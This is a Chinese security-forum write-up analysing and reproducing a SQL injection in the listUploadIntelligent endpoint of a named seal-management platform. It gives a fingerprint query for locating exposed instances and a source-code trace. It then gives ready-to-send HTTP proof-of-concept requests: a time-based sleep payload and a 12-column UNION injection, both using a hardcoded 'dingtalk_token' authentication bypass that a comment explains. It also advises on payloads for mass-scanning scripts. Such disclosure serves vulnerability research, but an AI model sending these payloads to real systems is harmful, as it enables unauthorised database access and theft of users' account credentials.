奇安信攻防社区-某管家印章智慧管理平台 listUploadIntelligent接口sql注入漏洞分析与复现

某管家印章智慧管理平台 listUploadIntelligent接口sql注入漏洞分析与复现

listUploadIntelligent接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码，利用该漏洞对数据库执行任意 SQL 操作，获取所有用户的账户密码信息。

一.漏洞描述
------

二.资产测绘
------

```js
app="章管家-印章智慧管理平台"
```

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-a050ebb9dac168525dafc68eb4d3ff6496e45665.png)

三.漏洞分析
------

1、首先有 这个 listUploadIntelligent 关键字，先用全局搜索工具搜一下

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-1d9e56ef95aa5c3051a3d371798310bfb24039cd.png)  
2、定位到ROOT\\WEB-INF\\classes\\com\\shjysoft\\api\\app\\AppMessageController.class 下的class文件，使用idea打开查看源码

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-b8303ff031ae0ab2ac3fe3091f1d3487d4569c5a.png)

3、首先源码中声明了路由为：/app/message/listUploadIntelligent.htm，且传参有：pageNo、pageSize、keyWord、startDate、endDate、deptIds、type\_id、is\_read，且方法自带参数有person\_id、unit\_id

4、接着往下看，queryMap会将前端传参全部存储，然后queryMap直接进入searchUploadIntelligentByRead方法，顾名思义，应该是查询操作，进入看代码

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-23fa0f0a151ac29e3de9c30cbe34fecdbf43b7b9.png)

5、进来一看，好家伙直接3个sql语句摆在眼前。第一个太长了有点麻烦，本着简单的原则，直接选第二个进行分析  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-562d0359836a99294e226f65a049042faddf2b55.png)

6、第二个sql语句if条件很简单，只要is\_read值不为空，即拼接sql。而sql最后面，is\_read值直接拼接了sql，为数字型注入点  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-d99aa4b965db2a535821319c625043daea079afe.png)

四.漏洞复现
------

1、回到本地 搭建的环境，构造一下请求发包：

```js
POST /app/message/listUploadIntelligent.htm?&person_id=1&unit_id=1 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x)
```

2、报错 Token无效，请重新登录。再使用文件搜索工具搜一下token,在main.jsp中找到token值为dingtalk\_token，再次构造：  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-ee760c485c3ac1b90370d795cbd9abe173bcca8d.png)  
![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-8fb5152edf5e6c3d9b00af3a13d2e9ceceb155a6.png)

3、poc1:

```js
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x)

```

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-a6afe30846e125622834a1cd13c995e95b01abbb.png)

4、当然，不是所有的站点 延时注入payload都一定通用。如果是编写扫描脚本，建议最好使用or 1=1 ,这样不容易漏掉。

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-871ea96bb3a75a398d8b066d7e23b49482a751e5.png)

5、同样，此注入也支持联合注入，字段数为12：  
poc2:

```js
POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 union select md5(123456),2,3,4,5,6,7,8,9,10,11,12 --
```

![图片.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2024/08/attach-aa570b760f4f0f6a2219f6a081e429566b304035.png)

发表于 2024-08-13 11:48:20
阅读 ( 7200 )
分类：Web应用

1 条评论

千年等一会 1秒前

没看懂怎么鉴权的

dddtest 回复千年等一会

当时审的时候比较赶，为了拿当时的活动悬赏金，没有详细说token的来历。看文章第2点第二个红框上方有句代码：boolean is_key = this.checkKeyCode(request); 跟进checkKeyCode方法，有： protected boolean checkKeyCode(HttpServletRequest request) { boolean result = false; String token = request.getParameter("token"); Object h5_token = this.redisManagerUtil.getObject(token); if (h5_token != null && StringUtil.isNotNullOrBlank(h5_token.toString())) { return true; } else if ("dingtalk_token".equals(token)) { return true; 所以token要是dingtalk_token才行

2025-07-01 11:19
回复